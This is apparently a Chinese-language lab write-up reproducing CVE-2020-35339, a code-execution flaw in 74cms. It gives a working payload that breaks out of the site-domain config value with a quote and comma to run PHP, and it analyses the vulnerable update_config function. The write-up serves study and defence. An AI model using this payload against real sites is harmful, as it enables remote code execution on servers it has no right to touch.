骑士cms任意代码执行(cve_2020_35339)

漏洞复现
url处输入index.php/admin.php进入后台登录界面

漏洞点在于网站的系统处

payload:http://127.0.0.1/.',phpinfo(),'/.com
保存后到登录界面

中间的phpinfo()也可以改成其他php命令
代码分析
拿docker容器源代码的办法
先docker ps 看一下容器ID
然后 docker exec -it d50318dd1023 /bin/bash 进入容器命令行
zip -r app.zip /app 压缩/app目录,文件都在里面
然后exit() 退出容器
docker cp d50318dd1023:/app/app.zip /home/susen(这个根据你的用户名)
然后就可以在/home/susen里面看到app.zip了
漏洞点在写入了配置文件 ,而配置文件是php后缀
最主要的漏洞点在于\Application\Common\Controller\BackendController.class.php
public function update_config($new_config, $config_file = '') {
!is_file($config_file) && $config_file = HOME_CONFIG_PATH . 'config.php';
if (is_writable($config_file)) {
$config = require $config_file;
$config = multimerge($config, $new_config);
if($config['SESSION_OPTIONS']){
$config['SESSION_OPTIONS']['path'] = SESSION_PATH;
}
file_put_contents($config_file, "<?php \nreturn " . stripslashes(var_export($config, true)) . ";", LOCK_EX);
@unlink(RUNTIME_FILE);
return true;
} else {
return false;
}
var_export() 生成带单引号的PHP代码字符串
输入一个域名 ,在/Application/Common/Conf/url.php处可以发现它在处理网站域名的时候只取“.”符号分割出来的最后两个，并且是以字符串的形式作为其中一个元素存在文件中的。如果要执行代码，我们应该让其作为一句php代码，而不是字符串单独存在。所以自然而然，很简单就可以使用“ ' ”闭合，用“,"使其独立。正巧使用到的这两个符号在前面的过滤函数中均未过滤